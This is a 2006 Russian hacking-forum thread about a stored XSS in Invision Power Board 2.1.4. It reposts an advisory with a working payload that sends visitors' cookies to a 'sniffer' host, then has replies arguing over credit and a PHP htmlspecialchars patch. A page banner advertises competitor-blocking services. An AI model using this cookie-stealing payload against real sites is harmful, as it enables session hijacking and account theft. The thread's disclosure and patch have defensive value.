Форум АНТИЧАТ - Active XSS in Invision Power Board 2.1.4

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Active XSS in Invision Power Board 2.1.4

Опции темы

Поиск в этой теме

Опции просмотра

Active XSS in Invision Power Board 2.1.4

02.03.2006, 22:37

~~k00p3r~~

Banned

Регистрация: 31.05.2005

Сообщений: 549

Провел на форуме:
484586

Репутация: 16

Отправить сообщение для k00p3r с помощью ICQ

Active XSS in Invision Power Board 2.1.4

Команда Cyber Lords, нашла новую багу в IPB.

Цитата:

Advisory: Active XSS in Invision Power Board 2.1.4

Уязвимость/Vulnerability: Межсайтовый скриптинг/Cross Site Scripting

Нет фильтрации входящих данных. Возможно проведение атаки межсайтовый скриптинг, отослав в форме жалобы на сообщение запрос вида: "<script>alert()</script>". С помощью данной атаки возможна утечка конфиденциальных данных пользователя на сторонний сервер.

Форма находится по адресу http://forum/index.php?act=report&t=123&p=123&st=0

Exploit: <script>img = new Image(); img.src = "http://sniffer/file.php?"+document.cookie;</script>

P.S. Далее у всей администрации форума, автоматически появится уведомление о жалобе.

02.03.2006, 23:18

Mobile

Регистрация: 18.02.2006

Сообщений: 1,090

Провел на форуме:
6489333

Репутация: 1564

Отправить сообщение для Mobile с помощью ICQ

Сам нашёл уязвимость?...

02.03.2006, 23:24

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

Отправить сообщение для GreenBear с помощью ICQ

Цитата:

Команда Cyber Lords, нашла новую багу в IPB.

=))))

__________________
Фреймворк для спамера :(
Услуги программирования

03.03.2006, 00:53

PinkPanther

[ розовый мафиозо ]

Регистрация: 16.03.2005

Сообщений: 301

Провел на форуме:
1736355

Репутация: 241

Первоначально багу нашел наш Морф, о чем ГМемберы могут видеть тут: http://forum.antichat.ru/thread11524.html

03.03.2006, 01:39

Mobile

Регистрация: 18.02.2006

Сообщений: 1,090

Провел на форуме:
6489333

Репутация: 1564

Морф красавец!...

03.03.2006, 18:19

Morph

Постоянный

Регистрация: 13.08.2004

Сообщений: 957

Провел на форуме:
1770063

Репутация: 429

Гы воть так нех приватные баги распространять вот блин тоже...................
Докатились............

ХРАНИТЬ ТАКОЕ НАДо!

)

03.03.2006, 18:50

D1mOn

Постоянный

Регистрация: 02.10.2005

Сообщений: 490

Провел на форуме:
2333839

Репутация: 212

да зря выложили!

03.03.2006, 19:00

Mobile

Регистрация: 18.02.2006

Сообщений: 1,090

Провел на форуме:
6489333

Репутация: 1564

Цитата:

Сообщение от k00p3r

Команда Cyber Lords, нашла новую багу в IPB.

Тоесть можно код сниффера залить, и всё?

03.03.2006, 20:51

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

Защита.
Открыть sources/action_public/misc/contact_member.php
Найти:

PHP код:


		
			
$this->lib->msg_post    = $this->email->message;

(431 строка по умолчанию)

Заменить на:

PHP код:


		
			
$this->lib->msg_post    = htmlspecialchars($this->email->message);

__________________
Фреймворк для спамера :(
Услуги программирования

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Взлом форумов IPB (Invision Power Board) < 2.0.4	Ice_Fro$T	Форумы	19	18.11.2006 09:19
Множественные уязвимости в INVISION POWER BOARD 2.1.x	GreenBear	Уязвимости	6	02.03.2006 21:36
Invision Power Board v2.0.4	sasi	Forum for discussion of ANTICHAT	4	08.02.2006 17:01
Вопрос про заливку шелла в Invision Power Board	DiNo	Форумы	14	03.03.2005 13:40

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход